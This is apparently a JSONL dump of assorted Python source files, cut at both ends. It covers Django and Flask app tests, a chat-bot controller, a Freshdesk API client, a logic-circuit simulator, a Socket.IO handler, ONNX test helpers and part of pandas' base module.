ValidationError\nfrom django.test.client import RequestFactory\n\nfrom mock import patch\nfrom nose.tools import assert_raises, eq_, ok_\nfrom waffle import Flag\n\nfrom flicks.base.regions import NORTH_AMERICA\nfrom flicks.base.tests import TestCase\nfrom flicks.videos.forms import VideoSearchForm\nfrom flicks.videos.search import AUTOCOMPLETE_FIELDS\n\n\nclass VideoSearchFormTests(TestCase):\n def setUp(self):\n super(VideoSearchFormTests, self).setUp()\n self.factory = RequestFactory()\n self.request = self.factory.get('/')\n\n def test_popular_sort_include(self):\n \"\"\"If the voting-end waffle flag is not set, include the popular option for sorting.\"\"\"\n Flag.objects.create(name='voting-end', everyone=False)\n form = VideoSearchForm(self.request)\n ok_('popular' in [c[0] for c in form.fields['sort'].choices])\n\n def test_popular_sort_exclude(self):\n \"\"\"If the voting-end waffle flag is set, do not include the popular option for sorting.\"\"\"\n Flag.objects.create(name='voting-end', everyone=True)\n form = VideoSearchForm(self.request)\n ok_('popular' not in [c[0] for c in form.fields['sort'].choices])\n\n @patch('flicks.videos.forms.search_videos')\n def test_valid_search(self, search_videos):\n form = VideoSearchForm(self.request, {\n 'query': 'asdf',\n 'field': 'title',\n 'region': NORTH_AMERICA,\n 'sort': 'popular'\n })\n\n eq_(form.perform_search(), search_videos.return_value)\n search_videos.assert_called_with(\n query='asdf',\n fields=AUTOCOMPLETE_FIELDS['title'],\n region=NORTH_AMERICA,\n sort='popular'\n )\n\n @patch('flicks.videos.forms.search_videos')\n def test_empty_field_passes_none(self, search_videos):\n \"\"\"If the field isn't specified, pass None to the fields parameter.\"\"\"\n form = VideoSearchForm(self.request, {\n 'query': 'asdf',\n 'region': NORTH_AMERICA,\n 'sort': 'popular'\n })\n\n eq_(form.perform_search(), search_videos.return_value)\n search_videos.assert_called_with(query='asdf', fields=None,\n region=NORTH_AMERICA, sort='popular')\n\n def test_invalid_form(self):\n \"\"\"If the form fails validation, throw a ValidationError.\"\"\"\n form = VideoSearchForm(self.request, {\n 'region': -5,\n 'sort': 'invalid'\n })\n\n with 
assert_raises(ValidationError):\n form.perform_search()\n\n def test_clean_no_query(self):\n \"\"\"\n If no search query is specified, do not alter the sort value or\n choices.\n \"\"\"\n form = VideoSearchForm(self.request, {'region': NORTH_AMERICA, 'sort': 'title'})\n form.full_clean()\n\n eq_(form.cleaned_data['sort'], 'title')\n choice_values = zip(*form.fields['sort'].choices)[0]\n ok_('' in choice_values)\n\n def test_clean_query(self):\n \"\"\"\n If a search query is specified, remove the random option from the sort\n choices and, if the sort is currently set to random, switch to title\n sort.\n \"\"\"\n form = VideoSearchForm(self.request, {'query': 'blah', 'sort': ''})\n form.full_clean()\n\n eq_(form.cleaned_data['sort'], 'title')\n choice_values = zip(*form.fields['sort'].choices)[0]\n ok_('' not in choice_values)\n\n # Check that sort is preserved if it is not random.\n form = VideoSearchForm(self.request, {'query': 'blah', 'sort': 'popular'})\n form.full_clean()\n\n eq_(form.cleaned_data['sort'], 'popular')\n choice_values = zip(*form.fields['sort'].choices)[0]\n ok_('' not in choice_values)\n\n def test_invalid_sort(self):\n \"\"\"\n An invalid value for sort should not break clean.\n\n Regression test for an issue where a user was attempting to break Flicks by submitting a\n bunch of invalid values for sort.\n \"\"\"\n form = VideoSearchForm(self.request, {'query': 'blah', 'sort': 'invalid'})\n form.full_clean()\n eq_(form.is_valid(), False)\n"} {"ext": "py", "sha": "1a2f88a032b687e865973285e2c7feb45eb8f216", "content": "from abc import ABC, abstractmethod\nimport os.path\nimport logging\nfrom exceptions import UnknownCommandError, FailedCommandError\nfrom sym_api_client_python.processors.sym_elements_parser import SymElementsParser\nfrom sym_api_client_python.processors.sym_message_parser import SymMessageParser\n\n\n# responses and views\n\nclass IResponse(ABC):\n\n @abstractmethod\n def update(self, action):\n pass\n\n\nclass NullResponse(IResponse):\n\n def update(self, action):\n pass\n\n\nclass IView(ABC):\n\n @abstractmethod\n def render(self, message):\n pass\n\n\n# Controller interfaces and classes\n\nclass IResponds(ABC):\n\n @property\n @abstractmethod\n def responds_to(self):\n pass\n\nclass IController(ABC):\n\n @abstractmethod\n def update(self, action):\n pass\n\n @abstractmethod\n def render(self, message):\n pass\n\nclass GeneralController(IController, IResponds):\n\n def __init__(self, response, view):\n self._response = response\n self._view = view\n\n def update(self, action):\n self._response.update(action)\n\n def render(self, message):\n return self._view.render(message)\n\n @staticmethod\n def make_form_id(cmd):\n return cmd.strip().lower().replace('/', '').replace(' ', '_')\n\n\nclass Controllers(IController):\n\n def __init__(self, controllers=None):\n self._controllers = controllers if controllers is not None else {}\n self._msg_parser = SymMessageParser()\n self._elements_parser = SymElementsParser()\n\n def update(self, action):\n ky = self._elements_parser.get_form_id(action)\n try:\n c = self._controllers[ky]\n except KeyError:\n raise UnknownCommandError(ky)\n c.update(action)\n\n def render(self, message):\n msg = ' '.join(self._msg_parser.get_text(message))\n ky = GeneralController.make_form_id(msg)\n try:\n c = self._controllers[ky]\n except KeyError:\n raise UnknownCommandError(msg)\n return c.render(message)\n\n def add(self, controller):\n ky = controller.make_form_id(controller.responds_to)\n self._controllers[ky] = controller\n\n"} 
{"ext": "py", "sha": "1a2f88ad4bd07d4bb77a5be1ed690861b63df3d2", "content": "import pdf_to_json as p2j\n\nimport json\n\nurl = \"file:data/multilingual/Latn.FON/Serif_16/udhr_Latn.FON_Serif_16.pdf\"\nlConverter = p2j.pdf_to_json.pdf_to_json_converter()\nlConverter.mImageHashOnly = True\nlDict = lConverter.convert(url)\nprint(json.dumps(lDict, indent=4, ensure_ascii=False, sort_keys=True))\n"} {"ext": "py", "sha": "1a2f894cf9aa445e7a5b19f18dc604e3c60b91be", "content": "from flask_wtf import FlaskForm\nfrom wtforms import StringField,TextAreaField,SubmitField\nfrom wtforms.validators import Required\n\nclass GroupForm(FlaskForm):\n '''\n Class to create a wtf form for creating a pitch\n '''\n name = StringField('Category Name', validators=[Required()])\n submit = SubmitField('Create')\n\nclass LineForm(FlaskForm):\n '''\n Class to create a wtf form for creating a pitch\n '''\n line_content = StringField('One Minute Pitch', validators=[Required()])\n submit = SubmitField('Submit')\n\nclass CommentForm(FlaskForm):\n '''\n Class to create a wtf form for creating a feedback on a pitch\n '''\n comment_content = TextAreaField('Comment', validators=[Required()])\n submit = SubmitField('Submit')\n\nclass UpvoteForm(FlaskForm):\n '''\n Class to create a wtf form for upvoting a pitch\n '''\n submit = SubmitField('Upvote')\n\n"} {"ext": "py", "sha": "1a2f89fc276fc1f9faa2cecf0ff4c04a0e765139", "content": "from ..Qt import QtGui, QtCore, QtWidgets\n\n__all__ = ['BusyCursor']\n\nclass BusyCursor(object):\n \"\"\"Class for displaying a busy mouse cursor during long operations.\n Usage::\n\n with pyqtgraph.BusyCursor():\n doLongOperation()\n\n May be nested.\n \"\"\"\n active = []\n\n def __enter__(self):\n QtWidgets.QApplication.setOverrideCursor(QtGui.QCursor(QtCore.Qt.WaitCursor))\n BusyCursor.active.append(self)\n\n def __exit__(self, *args):\n BusyCursor.active.pop(-1)\n if len(BusyCursor.active) == 0:\n QtWidgets.QApplication.restoreOverrideCursor()\n \n"} {"ext": "py", "sha": "1a2f8a4d3eab132a3ab8045df770fc8506f5d491", "content": "\"\"\"\nMIT License\n\nCopyright (c) 2020 Airbyte\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n\"\"\"\n\n\nfrom typing import Any, Mapping, Tuple\n\nfrom base_python import BaseClient\n\nfrom .api import (\n API,\n AgentsAPI,\n CompaniesAPI,\n ContactsAPI,\n ConversationsAPI,\n FreshdeskError,\n FreshdeskNotFound,\n FreshdeskUnauthorized,\n GroupsAPI,\n RolesAPI,\n SatisfactionRatingsAPI,\n SkillsAPI,\n SurveysAPI,\n TicketsAPI,\n TimeEntriesAPI,\n)\n\n\nclass Client(BaseClient):\n def __init__(self, domain, api_key, requests_per_minute: int = None):\n self._api = API(domain=domain, api_key=api_key, requests_per_minute=requests_per_minute)\n self._apis = {\n \"agents\": AgentsAPI(self._api),\n \"companies\": CompaniesAPI(self._api),\n \"contacts\": ContactsAPI(self._api),\n \"conversations\": ConversationsAPI(self._api),\n \"groups\": GroupsAPI(self._api),\n \"roles\": RolesAPI(self._api),\n \"skills\": SkillsAPI(self._api),\n \"surveys\": SurveysAPI(self._api),\n \"tickets\": TicketsAPI(self._api),\n \"time_entries\": TimeEntriesAPI(self._api),\n \"satisfaction_ratings\": SatisfactionRatingsAPI(self._api),\n }\n super().__init__()\n\n def settings(self):\n url = \"settings/helpdesk\"\n return self._api.get(url)\n\n def stream_has_state(self, name: str) -> bool:\n \"\"\"Tell if stream supports incremental sync\"\"\"\n return hasattr(self._apis[name], \"state\")\n\n def get_stream_state(self, name: str) -> Any:\n \"\"\"Get state of stream with corresponding name\"\"\"\n return self._apis[name].state\n\n def set_stream_state(self, name: str, state: Any):\n \"\"\"Set state of stream with corresponding name\"\"\"\n self._apis[name].state = state\n\n def _enumerate_methods(self) -> Mapping[str, callable]:\n return {name: api.list for name, api in self._apis.items()}\n\n def health_check(self) -> Tuple[bool, str]:\n alive = True\n error_msg = None\n\n try:\n self.settings()\n except (FreshdeskUnauthorized, FreshdeskNotFound):\n alive = False\n error_msg = \"Invalid credentials\"\n except FreshdeskError as error:\n alive = False\n error_msg = repr(error)\n\n return alive, error_msg\n"} {"ext": "py", "sha": "1a2f8a4d46289498c1b7c99de898aaad359f4233", "content": "from adder.full_adder import FullAdder\nfrom comparator.comparator import Comparator\nfrom decoder.decoder_mxn import Decoder_nxm\nfrom flipflop.d import D_FlipFlop\nfrom gate.and_gate import And\nfrom gate.input_gate import Input\nfrom gate.one_gate import One\nfrom gate.or_gate import Or\nfrom gate.xor_gate import Xor\nfrom gate.zero_gate import Zero\nfrom latch.d import D_Latch\nfrom multiplexer.mux2x1 import Mux2x1\nfrom multiplexer.mux_mxn import Mux_mxn\nfrom multiplexer.mux4x2 import Mux4x2\nfrom runner.circuit_runner import CircuitRunner\nfrom signals.signal import Signal\nfrom gate.not_gate import Not\n\nimport sys\n\nsys.setrecursionlimit(1000) # default is 1000\n\n\ndef turn_off_debug(every_thing=False):\n And.DEBUGMODE = every_thing\n Or.DEBUGMODE = every_thing\n Xor.DEBUGMODE = every_thing\n D_FlipFlop.DEBUGMODE = every_thing\n D_Latch.DEBUGMODE = every_thing\n Not.DEBUGMODE = every_thing\n Mux2x1.DEBUGMODE = every_thing\n Mux4x2.DEBUGMODE = every_thing\n Signal.DEBUGMODE = every_thing\n\n\ndef test1():\n clock = Signal()\n l1 = D_Latch(clock, None, \"l1\")\n\n l1.set_input(l1)\n l1.set()\n\n CircuitRunner.run([l1], clock, 4, [[l1]])\n\n\ndef test2():\n clock = 
Signal()\n d1 = D_FlipFlop(clock, None, \"d1\")\n not1 = Not(d1, \"not\")\n d1.set_input(not1)\n d1.set()\n\n for _ in range(20):\n clock.pulse()\n d1.logic()\n print(d1)\n\n\ndef johnson_counter(n=100):\n clock = Signal()\n bits = [D_FlipFlop(clock, None, f\"d{i}\") for i in range(n)]\n for i in range(1, n):\n bits[i].set_input(bits[i - 1])\n bits[i].reset()\n\n bits[0].set_input(Not(bits[-1], \"not\"))\n bits[0].reset()\n\n for _ in range(4 * n):\n clock.pulse()\n bits[0].logic()\n print(\"\".join([str(b.q()) for b in bits]))\n\n\ndef multiplexer_test():\n mux = Mux4x2((One(), Zero(), One(), Zero()), (One(), Zero()), \"my_mux\")\n CircuitRunner.run([mux], None, None, [[mux]])\n\n\ndef n_bit_adder():\n clock = Signal()\n n = 200\n a, b = \"01001\" * 40, \"01110\" * 40\n\n d1 = [D_FlipFlop(clock, None, f\"a{i}\") for i in range(n)]\n d2 = [D_FlipFlop(clock, None, f\"b{i}\") for i in range(n)]\n\n adder = [FullAdder(None, None, f\"adder{i}\") for i in range(n)]\n\n res = [D_FlipFlop(clock, None, f\"r{i}\") for i in range(n)]\n\n for i in range(n):\n d1[i].set_input(d1[i])\n d2[i].set_input(d2[i])\n adder[i].set_input((d1[i], d2[i]))\n adder[i].set_cin(Zero() if i == 0 else adder[i - 1].cout)\n\n res[i].set_input(adder[i].sum)\n res[i].reset()\n\n if a[n - i - 1] == '0':\n d1[i].reset()\n else:\n d1[i].set()\n\n if b[n - 1 - i] == '0':\n d2[i].reset()\n else:\n d2[i].set()\n\n CircuitRunner.run(res, clock, 3, [res])\n\n\ndef bitsToGates(bitString, inputs):\n for i in range(len(bitString)):\n inputs[i].output = 0 if bitString[i] == \"0\" else 1\n\n\ndef n_multiplexer_test():\n inputs = [Input() for _ in range(32)]\n selectors = [Input() for _ in range(5)]\n mux = Mux_mxn(inputs, selectors, 5)\n\n bitsToGates(\"11001110011100111001110011100101\", inputs)\n\n for i in range(32):\n i_bin = bin(i)[2:].zfill(5)\n bitsToGates(i_bin, selectors)\n\n CircuitRunner.run([mux], display=[[mux]])\n\n\ndef decoder_test():\n inputs = [Input() for _ in range(5)]\n dec = Decoder_nxm(inputs, 5)\n\n bitsToGates(\"11101\", inputs)\n CircuitRunner.run([dec], display=[dec.outputs])\n\n\ndef comparator_test():\n i1 = [Input() for _ in range(5)]\n i2 = [Input() for _ in range(5)]\n comp = Comparator((i1, i2), 5)\n\n bitsToGates(\"11101\", i1)\n bitsToGates(\"11101\", i2)\n\n CircuitRunner.run([comp], display=[[comp]])\n\n\nturn_off_debug(False)\n\njohnson_counter(800)\n"} {"ext": "py", "sha": "1a2f8b5f650d7adc8c1626bf5f2481e3ee7bd6d3", "content": "import re\nimport gevent\n\nfrom gevent.pywsgi import WSGIHandler\nfrom socketio import transports\nfrom geventwebsocket.handler import WebSocketHandler\n\nclass SocketIOHandler(WSGIHandler):\n path_re = re.compile(r\"^/(?P[^/]+)/(?P[^/]+)(/(?P[^/]*)/?(?P.*))?$\")\n\n handler_types = {\n 'websocket': transports.WebsocketTransport,\n 'flashsocket': transports.FlashSocketTransport,\n 'htmlfile': transports.HTMLFileTransport,\n 'xhr-multipart': transports.XHRMultipartTransport,\n 'xhr-polling': transports.XHRPollingTransport,\n 'jsonp-polling': transports.JSONPolling,\n }\n\n def __init__(self, *args, **kwargs):\n self.socketio_connection = False\n self.allowed_paths = None\n\n super(SocketIOHandler, self).__init__(*args, **kwargs)\n\n def handle_one_response(self):\n self.status = None\n self.headers_sent = False\n self.result = None\n self.response_length = 0\n self.response_use_chunked = False\n\n path = self.environ.get('PATH_INFO')\n parts = SocketIOHandler.path_re.match(path)\n\n # Is this a valid SocketIO path?\n if parts:\n parts = parts.groupdict()\n else:\n return 
super(SocketIOHandler, self).handle_one_response()\n\n resource = parts['resource']\n if resource != self.server.resource:\n return super(SocketIOHandler, self).handle_one_response()\n\n transport_name = parts['transport']\n transport = SocketIOHandler.handler_types.get(transport_name)\n if transport is None:\n return super(SocketIOHandler, self).handle_one_response()\n\n session_id = parts.get('session_id')\n request_method = self.environ.get(\"REQUEST_METHOD\")\n\n # In case this is WebSocket request, switch to the WebSocketHandler\n if transport in (transports.WebsocketTransport, \\\n transports.FlashSocketTransport):\n self.__class__ = WebSocketHandler\n self.handle_one_response(call_wsgi_app=False)\n session = self.server.get_session()\n else:\n session = self.server.get_session(session_id)\n\n # Make the session object available for WSGI apps\n self.environ['socketio'].session = session\n\n # Create a transport and handle the request likewise\n self.transport = transport(self)\n jobs = self.transport.connect(session, request_method)\n\n if not session.wsgi_app_greenlet or not bool(session.wsgi_app_greenlet):\n # Call the WSGI application, and let it run until the Socket.IO\n # is *disconnected*, even though many POST/polling requests\n # come through.\n session.wsgi_app_greenlet = gevent.getcurrent()\n session.connected = True\n self.application(self.environ,\n lambda status, headers, exc=None: None)\n session.connected = False\n\n gevent.joinall(jobs)\n"} {"ext": "py", "sha": "1a2f8b6f6aaf7c574a736be44599e469d44fbe2a", "content": "from django.test import TestCase\nfrom .models import Foto,Comment,Follower,Profile\nclass ProfileTestClass(TestCase):\n\n # Set up method\n def setUp(self):\n self.profile= Profile(image = 'Jam.jpeg', name ='Muriuki', email ='james@moringaschool.com',bio = 'hdeydfedf')\n\n # Testing instance\n def test_instance(self):\n self.assertTrue(self.profile,Follower)\n\n def tearDown(self):\n Follower.objects.all().delete()\n \n def test_save(self):\n self.profile.save_profile()\n profile= Profile.objects.all()\n self.assertTrue(len(profile)>=1) \n\n def test_upd(self):\n profile = Profile.objects.filter(id=1)\n profile.update(image = 'Kam.jpeg', name ='Murki', email ='james@morischool.com',bio = 'hdefedf')\n search = Profile.objects.filter(id=1)\n self.assertNotEqual(search,'Kam.jpeg')\n\n def test_dele(self):\n self.profile.save_profile()\n profi = Profile.objects.all()\n self.assertTrue(len(profi)>=0) \n \n \nclass CommentTestClass(TestCase):\n\n # Set up method\n def setUp(self):\n self.comment= Comment(comment = 'Fun')\n\n # Testing instance\n def test_instance(self):\n self.assertTrue(self.comment,Comment) \n\n # Testing Save Method\n def test_save(self):\n self.comment.save_comment()\n comments = Comment.objects.all()\n self.assertTrue(len(comments) >= 1) \n\n def test_upd(self):\n comment = Comment.objects.filter(id=1)\n comment.update(comment ='Art')\n search = Comment.objects.filter(id=1)\n self.assertNotEqual(search,'Art') \n\n def test_del(self):\n self.comment.save_comment()\n comments = self.comment.dele_comment()\n comment = Comment.objects.all()\n self.assertTrue(len(comment)<=0)\n\n def tearDown(self):\n Comment.objects.all().delete() \n\nclass FotoTestClass(TestCase):\n\n def setUp(self):\n self.profile= Profile(image = 'Jam.jpeg', name ='Muriuki', email ='james@moringaschool.com',bio = 'hdeydfedf')\n self.profile.save_profile()\n\n self.new_comment = Comment(comment = 'Fun')\n self.new_comment.save_comment()\n\n self.new_photos= Foto(image = 
'Jam.jpeg', name ='Muriuki', caption ='jamesmoringaschoolcom',like = \"2\", comments=self.new_comment)\n self.new_photos.save_pic()\n\n def tearDown(self):\n Profile.objects.all().delete()\n Comment.objects.all().delete()\n Foto.objects.all().delete() \n\n def test_save_pick(self):\n self.new_photos= Foto(image = 'Jam.jpeg', name ='Muriuki', caption ='jamesmoringaschoolcom',like = \"2\", comments=self.new_comment)\n self.new_photos.save_pic()\n picture = Foto.objects.all()\n self.assertTrue(len(picture)>=1)\n\n def test_dele_pick(self):\n self.new_photos= Foto(image = 'Jam.jpeg', name ='Muriuki', caption ='jamesmoringaschoolcom',like = \"2\", comments=self.new_comment)\n self.new_photos.save_pic()\n picture = self.new_photos.dele_pic()\n delete = Foto.objects.all()\n self.assertTrue(len(delete)>=0) \n\n def test_upd_pic(self):\n image = Foto.objects.filter(id=1)\n image.update(name ='lez.jpeg')\n search = Foto.objects.filter(id=1)\n self.assertNotEqual(search,'lez.jpeg') \n \n def test_pic_id(self):\n self.image = Foto(image = 'Jam.jpeg', name ='Muriuki', caption ='jamesmoringaschoolcom',like = \"2\", comments=self.new_comment)\n self.image.save_pic()\n search = Foto.image_by_id(self.image.id)\n self.assertNotEqual(search,self.image) \n \n "} {"ext": "py", "sha": "1a2f8bcccfe71e30a7de12aa0c698428913e294e", "content": "def get_set():\n return set(map(int, input().split()))\n\n\ndef is_super_set(main, sets):\n for set in sets:\n if not main.issuperset(set):\n return False\n\n return True\n\n\nA = get_set()\nqueries = int(input())\nsets = []\n\nfor _ in range(queries):\n sets.append(get_set())\n\nprint(is_super_set(A, sets))\n"} {"ext": "py", "sha": "1a2f8dcb8f9b4d277dcf0b89bd2d577aaf5bd104", "content": "# SPDX-License-Identifier: Apache-2.0\n\nimport os\nfrom distutils.version import StrictVersion\nimport numpy as np\nimport onnx\nfrom onnxruntime import __version__ as ort_version\nfrom skl2onnx import __max_supported_opset__ as max_opset\nfrom skl2onnx.common._topology import OPSET_TO_IR_VERSION\nfrom .tests_helper import dump_data_and_model # noqa\nfrom .tests_helper import ( # noqa\n dump_one_class_classification,\n dump_binary_classification,\n dump_multilabel_classification,\n dump_multiple_classification)\nfrom .tests_helper import ( # noqa\n dump_multiple_regression,\n dump_single_regression,\n convert_model,\n fit_classification_model,\n fit_multilabel_classification_model,\n fit_clustering_model,\n fit_regression_model,\n binary_array_to_string,\n path_to_leaf\n)\n\n\ndef create_tensor(N, C, H=None, W=None):\n if H is None and W is None:\n return np.random.rand(N, C).astype(np.float32, copy=False)\n elif H is not None and W is not None:\n return np.random.rand(N, C, H, W).astype(np.float32, copy=False)\n else:\n raise ValueError('This function only produce 2-D or 4-D tensor.')\n\n\ndef _get_ir_version(opv):\n if opv >= 15:\n return 8\n if opv >= 12:\n return 7\n if opv >= 11:\n return 6\n if opv >= 10:\n return 5\n if opv >= 9:\n return 4\n if opv >= 8:\n return 4\n return 3\n\n\ndef max_onnxruntime_opset():\n \"\"\"\n See `Versioning.md\n `_.\n \"\"\"\n vi = StrictVersion(ort_version.split('+')[0])\n if vi >= StrictVersion(\"1.9.0\"):\n return 15\n if vi >= StrictVersion(\"1.8.0\"):\n return 14\n if vi >= StrictVersion(\"1.6.0\"):\n return 13\n if vi >= StrictVersion(\"1.3.0\"):\n return 12\n if vi >= StrictVersion(\"1.0.0\"):\n return 11\n if vi >= StrictVersion(\"0.4.0\"):\n return 10\n if vi >= StrictVersion(\"0.3.0\"):\n return 9\n return 8\n\n\nTARGET_OPSET = int(\n 
os.environ.get(\n 'TEST_TARGET_OPSET',\n min(max_onnxruntime_opset(),\n min(max_opset,\n onnx.defs.onnx_opset_version()))))\n\nTARGET_IR = int(\n os.environ.get(\n 'TEST_TARGET_IR',\n min(OPSET_TO_IR_VERSION[TARGET_OPSET],\n _get_ir_version(TARGET_OPSET))))\n"} {"ext": "py", "sha": "1a2f906f97152222149dfc9b95e0e3885a19b936", "content": "\"\"\"\nBase and utility classes for pandas objects.\n\"\"\"\nimport builtins\nfrom collections import OrderedDict\nimport textwrap\nfrom typing import Dict, FrozenSet, Optional\nimport warnings\n\nimport numpy as np\n\nimport pandas._libs.lib as lib\nfrom pandas.compat import PYPY\nfrom pandas.compat.numpy import function as nv\nfrom pandas.errors import AbstractMethodError\nfrom pandas.util._decorators import Appender, Substitution, cache_readonly\nfrom pandas.util._validators import validate_bool_kwarg\n\nfrom pandas.core.dtypes.cast import is_nested_object\nfrom pandas.core.dtypes.common import (\n is_categorical_dtype,\n is_datetime64_ns_dtype,\n is_datetime64tz_dtype,\n is_datetimelike,\n is_extension_array_dtype,\n is_extension_type,\n is_list_like,\n is_object_dtype,\n is_scalar,\n is_timedelta64_ns_dtype,\n)\nfrom pandas.core.dtypes.generic import ABCDataFrame, ABCIndexClass, ABCSeries\nfrom pandas.core.dtypes.missing import isna\n\nfrom pandas.core import algorithms, common as com\nfrom pandas.core.accessor import DirNamesMixin\nfrom pandas.core.algorithms import duplicated, unique1d, value_counts\nfrom pandas.core.arrays import ExtensionArray\nimport pandas.core.nanops as nanops\n\n_shared_docs = dict() # type: Dict[str, str]\n_indexops_doc_kwargs = dict(\n klass=\"IndexOpsMixin\",\n inplace=\"\",\n unique=\"IndexOpsMixin\",\n duplicated=\"IndexOpsMixin\",\n)\n\n\nclass PandasObject(DirNamesMixin):\n \"\"\"baseclass for various pandas objects\"\"\"\n\n @property\n def _constructor(self):\n \"\"\"class constructor (for this class it's just `__class__`\"\"\"\n return self.__class__\n\n def __repr__(self):\n \"\"\"\n Return a string representation for a particular object.\n \"\"\"\n # Should be overwritten by base classes\n return object.__repr__(self)\n\n def _reset_cache(self, key=None):\n \"\"\"\n Reset cached properties. If ``key`` is passed, only clears that key.\n \"\"\"\n if getattr(self, \"_cache\", None) is None:\n return\n if key is None:\n self._cache.clear()\n else:\n self._cache.pop(key, None)\n\n def __sizeof__(self):\n \"\"\"\n Generates the total memory usage for an object that returns\n either a value or Series of values\n \"\"\"\n if hasattr(self, \"memory_usage\"):\n mem = self.memory_usage(deep=True)\n if not is_scalar(mem):\n mem = mem.sum()\n return int(mem)\n\n # no memory_usage attribute, so fall back to\n # object's 'sizeof'\n return super().__sizeof__()\n\n\nclass NoNewAttributesMixin:\n \"\"\"Mixin which prevents adding new attributes.\n\n Prevents additional attributes via xxx.attribute = \"something\" after a\n call to `self.__freeze()`. Mainly used to prevent the user from using\n wrong attributes on a accessor (`Series.cat/.str/.dt`).\n\n If you really want to add a new attribute at a later time, you need to use\n `object.__setattr__(self, key, value)`.\n \"\"\"\n\n def _freeze(self):\n \"\"\"Prevents setting additional attributes\"\"\"\n object.__setattr__(self, \"__frozen\", True)\n\n # prevent adding any attribute via s.xxx.new_attribute = ...\n def __setattr__(self, key, value):\n # _cache is used by a decorator\n # We need to check both 1.) cls.__dict__ and 2.) getattr(self, key)\n # because\n # 1.) 
getattr is false for attributes that raise errors\n # 2.) cls.__dict__ doesn't traverse into base classes\n if getattr(self, \"__frozen\", False) and not (\n key == \"_cache\"\n or key in type(self).__dict__\n or getattr(self, key, None) is not None\n ):\n raise AttributeError(\n \"You cannot add any new attribute '{key}'\".format(key=key)\n )\n object.__setattr__(self, key, value)\n\n\nclass GroupByError(Exception):\n pass\n\n\nclass DataError(GroupByError):\n pass\n\n\nclass SpecificationError(GroupByError):\n pass\n\n\nclass SelectionMixin:\n \"\"\"\n mixin implementing the selection & aggregation interface on a group-like\n object sub-classes need to define: obj, exclusions\n \"\"\"\n\n _selection = None\n _internal_names = [\"_cache\", \"__setstate__\"]\n _internal_names_set = set(_internal_names)\n\n _builtin_table = OrderedDict(\n ((builtins.sum, np.sum), (builtins.max, np.max), (builtins.min, np.min))\n )\n\n _cython_table = OrderedDict(\n (\n (builtins.sum, \"sum\"),\n (builtins.max, \"max\"),\n (builtins.min, \"min\"),\n (np.all, \"all\"),\n (np.any, \"any\"),\n (np.sum, \"sum\"),\n (np.nansum, \"sum\"),\n (np.mean, \"mean\"),\n (np.nanmean, \"mean\"),\n (np.prod, \"prod\"),\n (np.nanprod, \"prod\"),\n (np.std, \"std\"),\n (np.nanstd, \"std\"),\n (np.var, \"var\"),\n (np.nanvar, \"var\"),\n (np.median, \"median\"),\n (np.nanmedian, \"median\"),\n (np.max, \"max\"),\n (np.nanmax, \"max\"),\n (np.min, \"min\"),\n (np.nanmin, \"min\"),\n (np.cumprod, \"cumprod\"),\n (np.nancumprod, \"cumprod\"),\n (np.cumsum, \"cumsum\"),\n (np.nancumsum, \"cumsum\"),\n )\n )\n\n @property\n def _selection_name(self):\n \"\"\"\n return a name for myself; this would ideally be called\n the 'name' property, but we cannot conflict with the\n Series.name property which can be set\n \"\"\"\n if self._selection is None:\n return None # 'result'\n else:\n return self._selection\n\n @property\n def _selection_list(self):\n if not isinstance(\n self._selection, (list, tuple, ABCSeries, ABCIndexClass, np.ndarray)\n ):\n return [self._selection]\n return self._selection\n\n @cache_readonly\n def _selected_obj(self):\n\n if self._selection is None or isinstance(self.obj, ABCSeries):\n return self.obj\n else:\n return self.obj[self._selection]\n\n @cache_readonly\n def ndim(self):\n return self._selected_obj.ndim\n\n @cache_readonly\n def _obj_with_exclusions(self):\n if self._selection is not None and isinstance(self.obj, ABCDataFrame):\n return self.obj.reindex(columns=self._selection_list)\n\n if len(self.exclusions) > 0:\n return self.obj.drop(self.exclusions, axis=1)\n else:\n return self.obj\n\n def __getitem__(self, key):\n if self._selection is not None:\n raise IndexError(\n \"Column(s) {selection} already selected\".format(\n selection=self._selection\n )\n )\n\n if isinstance(key, (list, tuple, ABCSeries, ABCIndexClass, np.ndarray)):\n if len(self.obj.columns.intersection(key)) != len(key):\n bad_keys = list(set(key).difference(self.obj.columns))\n raise KeyError(\n \"Columns not found: {missing}\".format(missing=str(bad_keys)[1:-1])\n )\n return self._gotitem(list(key), ndim=2)\n\n elif not getattr(self, \"as_index\", False):\n if key not in self.obj.columns:\n raise KeyError(\"Column not found: {key}\".format(key=key))\n return self._gotitem(key, ndim=2)\n\n else:\n if key not in self.obj:\n raise KeyError(\"Column not found: {key}\".format(key=key))\n return self._gotitem(key, ndim=1)\n\n def _gotitem(self, key, ndim, subset=None):\n \"\"\"\n sub-classes to define\n return a sliced object\n\n 
Parameters\n ----------\n key : string / list of selections\n ndim : 1,2\n requested ndim of result\n subset : object, default None\n subset to act on\n\n \"\"\"\n raise AbstractMethodError(self)\n\n def aggregate(self, func, *args, **kwargs):\n raise AbstractMethodError(self)\n\n agg = aggregate\n\n def _try_aggregate_string_function(self, arg: str, *args, **kwargs):\n \"\"\"\n if arg is a string, then try to operate on it:\n - try to find a function (or attribute) on ourselves\n - try to find a numpy function\n - raise\n\n \"\"\"\n assert isinstance(arg, str)\n\n f = getattr(self, arg, None)\n if f is not None:\n if callable(f):\n return f(*args, **kwargs)\n\n # people may try to aggregate on a non-callable attribute\n # but don't let them think they can pass args to it\n assert len(args) == 0\n assert (\n len([kwarg for kwarg in kwargs if kwarg not in [\"axis\", \"_level\"]]) == 0\n )\n return f\n\n f = getattr(np, arg, None)\n if f is not None:\n if hasattr(self, \"__array__\"):\n # in particular exclude Window\n return f(self, *args, **kwargs)\n\n raise AttributeError(\n 